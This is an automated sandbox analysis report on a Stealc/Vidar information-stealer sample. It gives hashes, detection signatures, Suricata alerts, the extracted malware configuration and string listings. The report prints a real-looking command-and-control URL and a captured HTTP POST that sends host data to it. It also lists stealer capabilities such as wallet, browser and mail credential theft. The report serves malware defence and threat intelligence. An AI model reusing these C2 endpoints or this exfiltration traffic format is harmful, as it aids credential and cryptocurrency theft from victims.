Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1525134
MD5:	49f94ca1e283413adc5163d5ffa2c92a
SHA1:	b5b123b0b33c407a398e9b1a07376198525f9c46
SHA256:	883cd6bc778f914d4f19fc3d70fbf5da5bf5e65c8d7f08bb7b5a85eaa80bdd9b
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 49F94CA1E283413ADC5163D5FFA2C92A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1752059108.0000000004E80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7336	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7336	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7336	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7336	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.8a0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T18:38:11.129692+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T18:38:11.080940+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T18:38:11.351514+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T18:38:12.515053+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T18:38:11.359567+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T18:38:10.820665+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T18:38:12.994174+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:20.085129+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:21.210579+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:21.885080+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:22.505528+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:24.291808+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:24.858050+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 31 42 35 39 42 45 43 38 31 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="hwid"81B59BEC81D32089257003------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build"doma------HCAAEBKEGHJKEBFHJDBF--

Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.1
Source: file.exe, 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2002927025.00000000296E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dlleH
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllwH
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllKH
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllyH
Source: file.exe, 00000000.00000002.1979573658.00000000012A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll3IZ
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpFirefox
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpeF1
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnF
Source: file.exe, 00000000.00000002.1979573658.00000000012EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phppFL
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37o
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2007449138.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2006812075.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1996927028.000000001D72B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: HCAKFBGC.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: HCAKFBGC.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HCAKFBGC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HCAKFBGC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HCAKFBGC.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HCAKFBGC.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HCAKFBGC.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AECAKECAEGDHIECBGHII.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://support.mozilla.org
Source: HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1850248317.000000001D630000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000003.1850248317.000000001D630000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: HCAKFBGC.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1979573658.0000000001334000.00000004.00000020.00020000.00000000.sdmp, AECAKECAEGDHIECBGHII.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: HCAKFBGC.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1945827940.000000002990C000.00000004.00000020.00020000.00000000.sdmp, HIDAKFIJJKJJJKEBKJEHCBGDAK.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
